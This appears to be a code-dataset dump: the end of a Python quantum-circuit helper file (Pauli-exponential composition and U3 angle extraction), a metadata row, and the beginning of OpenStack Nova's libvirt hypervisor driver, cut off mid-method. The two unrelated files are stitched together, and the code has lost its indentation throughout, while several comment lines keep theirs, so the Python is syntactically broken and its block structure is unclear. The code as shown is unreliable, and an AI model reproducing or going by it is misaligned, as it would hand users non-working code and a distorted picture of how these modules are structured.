self.a = np.linalg.norm(v)
self.v = v/self.a
def __mul__(self,w):
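        # Composes exp(i*a*(n.sigma)) * exp(i*b*(m.sigma)), with self as the
        # left factor and w as the right, into a single exp(i*c*(k.sigma)):
        #   cos(c)   = cos(a)cos(b) - (n.m)*sin(a)sin(b)
        #   k*sin(c) = n*sin(a)cos(b) + m*cos(a)sin(b) - (n x m)*sin(a)sin(b)
        # which follows from (n.sigma)(m.sigma) = (n.m)*I + i*(n x m).sigma.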
if self.iden:
return w
if w.iden:
return self
cc = np.cos(self.a)*np.cos(w.a)
cs = np.cos(self.a)*np.sin(w.a)
sc = np.sin(self.a)*np.cos(w.a)
ss = np.sin(self.a)*np.sin(w.a)
c = np.arccos(cc-np.dot(self.v,w.v.T)*ss)
k1 = self.v*sc
k2 = w.v*cs
k3 = -np.cross(self.v,w.v)*ss
k = (1/np.sin(c))*(k1+k2+k3)
return ExpPauli(c*k)
def __str__(self):
t = '||v||: {:.5f}, '.format(self.a)
t+= 'nx: {:+.5f}, '.format(self.v[0,0])
t+= 'ny: {:+.5f}, '.format(self.v[0,1])
t+= 'nz: {:+.5f}'.format(self.v[0,2])
return t
def matrix(self):
x = np.matrix([[0,1],[1,0]],dtype=np.complex_)
y = np.matrix([[0,-1j],[1j,0]],dtype=np.complex_)
z = np.matrix([[1,0],[0,-1]],dtype=np.complex_)
nx,ny,nz = self.v[0,0],self.v[0,1],self.v[0,2]
i = np.identity(2)
if self.iden:
return np.identity(2)
return np.cos(self.a)*i + (x*nx+y*ny+z*nz)*1j*np.sin(self.a)
def U3(self):
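        # Returns angles (theta, phi, lam) of a U3(theta, phi, lam) gate that
        # reproduces exp(i*a*(n.sigma)) up to a global phase: theta is set by
        # the X/Y weight, while phi and lam come from the phases of the
        # diagonal (vd) and off-diagonal (vo) matrix entries.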
if self.iden:
return 0,0,0
A = np.sin(self.a)**2
nx,ny,nz = self.v[0,0],self.v[0,1],self.v[0,2]
part = nx**2+ny**2
vd = np.cos(self.a)+1j*nz*np.sin(self.a)
vo = (1j*nx-ny)*np.sin(self.a)
if abs(part-0)<=1e-10:
theta= 0
sigma = (1j*np.log(vd)).real
delta= 0
else:
theta = 2*np.arcsin(np.sqrt((nx**2+ny**2)*A))
aleph=-ny*np.sin(self.a)/np.sin(theta/2)
beta = nx*np.sin(self.a)/np.sin(theta/2)
delta = (-1j*np.log(vo/np.sin(theta/2))).real
sigma = (1j*np.log(vd/np.cos(theta/2))).real
return theta,sigma+delta,sigma-delta
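# A minimal usage sketch: compose two single-qubit rotations and read back the
# U3 angles for a circuit, e.g.
#   rx = ExpPauli(np.array([0.3, 0.0, 0.0]))   # exp(i*0.3*X)
#   rz = ExpPauli(np.array([0.0, 0.0, 0.5]))   # exp(i*0.5*Z)
#   theta, phi, lamb = (rx * rz).U3()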
class BenzyneInstruct(Instructions):
'''
type 1, 2 and 3
'''
def __init__(self,operator,
Nq,
propagate=False,
HamiltonianOperator=[],
scaleH=1,
**kw):
        if Nq != 1:
            sys.exit('Did not get 1 qubit in instructions...')
para = np.array([0.0,0.0,0.0])
expS = ExpPauli(para)
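        # Build the accumulated exponential: each term group A in `operator`
        # defines exp(i*(x*X + y*Y + z*Z)) from the imaginary parts of its
        # coefficients and is left-multiplied onto the running product.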
for A in operator:
para = np.array([0.0,0.0,0.0])
for o in A:
if o.s=='X':
para[0]=np.imag(o.c)
elif o.s=='Y':
para[1]=np.imag(o.c)
elif o.s=='Z':
para[2]=np.imag(o.c)
expS = ExpPauli(para)*expS
#
paraH = np.array([0.0,0.0,0.0])
for o in HamiltonianOperator:
if o.s=='X':
paraH[0]= np.real(o.c)*scaleH
elif o.s=='Y':
paraH[1]=np.real(o.c)*scaleH
elif o.s=='Z':
paraH[2]=np.real(o.c)*scaleH
expiH = ExpPauli(paraH)
exp = expiH*expS
self._gates = [
[(exp,),self._U3]
]
@property
def gates(self):
return self._gates
@gates.setter
def gates(self,a):
self._gates = a
def _U3(self,Q,exp):
theta,phi,lamb = exp.U3()
Q.U3(0,theta,phi,lamb)
| 29.304688 | 68 | 0.466276 | [
"Apache-2.0"
] | damazz/HQCA | examples/r2021_arxiv_qcase_benzyne/_instruct_22.py | 3,751 | Python |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
"""
import errno
import functools
import glob
import mmap
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
import six
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import units
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import rpc
from nova import utils
from nova import version
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt.disk.vfs import guestfs
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt import hardware
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import lvm
from nova.virt.libvirt import rbd
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt import vif as libvirt_vif
from nova.virt import netutils
from nova.virt import watchdog_actions
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image. This will not be used if an image id '
'is provided by the user.'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('virt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('connection_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on virt_type)'),
cfg.BoolOpt('inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('inject_key',
default=False,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('inject_partition',
default=-2,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.ListOpt('volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on virt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If virt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'cpu_mode="custom" and virt_type="kvm|qemu"'),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts, 'libvirt')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
CONF.import_opt('vcpu_pin_set', 'nova.virt.hardware')
CONF.import_opt('vif_plugging_is_fatal', 'nova.virt.driver')
CONF.import_opt('vif_plugging_timeout', 'nova.virt.driver')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * units.Ki
# The libvirt driver will prefix any disable reason codes with this string.
DISABLE_PREFIX = 'AUTO: '
# Disable reason for the service which was enabled or disabled without reason
DISABLE_REASON_UNDEFINED = 'None'
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 11)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
# TODO(sdague): this should be 1.0.0, but hacked to set 1.3.0 until
# https://bugs.launchpad.net/nova/+bug/1334398
# can be diagnosed & resolved
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 3, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
# Relative block commit (feature is detected,
# this version is only used for messaging)
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION = (1, 2, 7)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._skip_list_all_domains = False
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
self.vif_driver = libvirt_vif.LibvirtGenericVIFDriver(
self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt.volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
self._conn_supports_start_paused = CONF.libvirt.virt_type in ('kvm',
'qemu')
for mode_str in CONF.libvirt.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_LW('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
self._image_api = image.API()
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def _set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _conn_has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._conn_has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
self.emit_event(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = last_close_event['reason']
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable compute service to avoid
# new instances of being scheduled on this host.
self._set_host_enabled(False, disable_reason=_error)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _do_quality_warnings(self):
"""Warn about untested driver configurations.
This will log a warning message about untested driver or host arch
configurations to indicate to administrators that the quality is
unknown. Currently, only qemu or kvm on intel 32- or 64-bit systems
is tested upstream.
"""
caps = self._get_host_capabilities()
arch = caps.host.cpu.arch
if (CONF.libvirt.virt_type not in ('qemu', 'kvm') or
arch not in ('i686', 'x86_64')):
LOG.warn(_LW('The libvirt driver is not tested on '
'%(type)s/%(arch)s by the OpenStack project and '
'thus its quality can not be ensured. For more '
'information, see: https://wiki.openstack.org/wiki/'
'HypervisorSupportMatrix'),
{'type': CONF.libvirt.virt_type, 'arch': arch})
def init_host(self, host):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._do_quality_warnings()
# Stop libguestfs using KVM unless we're also configured
        # to use this. This solves a problem where people need to
# stop Nova use of KVM because nested-virt is broken
if CONF.libvirt.virt_type != "kvm":
guestfs.force_tcg()
if not self._has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_LE('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self.uri())
wrapped_conn = None
try:
wrapped_conn = self._connect(self.uri(), self.read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = DISABLE_REASON_UNDEFINED
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
self._set_host_enabled(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
self._skip_list_all_domains = False
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
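        """Receives connection close events and queues them for dispatch."""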
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
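        """Returns False if the connection has broken and must be reopened."""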
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def uri():
if CONF.libvirt.virt_type == 'uml':
uri = CONF.libvirt.connection_uri or 'uml:///system'
elif CONF.libvirt.virt_type == 'xen':
uri = CONF.libvirt.connection_uri or 'xen:///'
elif CONF.libvirt.virt_type == 'lxc':
uri = CONF.libvirt.connection_uri or 'lxc:///'
else:
uri = CONF.libvirt.connection_uri or 'qemu:///system'
return uri
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
LibvirtDriver._connect_auth_cb,
None]
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance.name)
return True
except exception.NovaException:
return False
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self._conn.listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self._conn.numOfDomains() > 0:
for id in self._conn.listDomainsID():
try:
dom = self._lookup_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self._conn.listDefinedDomains():
try:
dom = self._lookup_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def _list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def list_instances(self):
names = []
for dom in self._list_instance_domains(only_running=False):
names.append(dom.name())
return names
def list_instance_uuids(self):
uuids = []
for dom in self._list_instance_domains(only_running=False):
uuids.append(dom.UUIDString())
return uuids
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def _unplug_vifs(self, instance, network_info, ignore_errors):
"""Unplug VIFs from networks."""
for vif in network_info:
try:
self.vif_driver.unplug(instance, vif)
except exception.NovaException:
if not ignore_errors:
raise
def unplug_vifs(self, instance, network_info):
self._unplug_vifs(instance, network_info, False)
def _teardown_container(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
rootfs_dev = instance.system_metadata.get('rootfs_device_name')
disk.teardown_container(container_dir, rootfs_dev)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
# NOTE(GuanQiang): teardown container to avoid resource leak
if CONF.libvirt.virt_type == 'lxc':
self._teardown_container(instance)
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
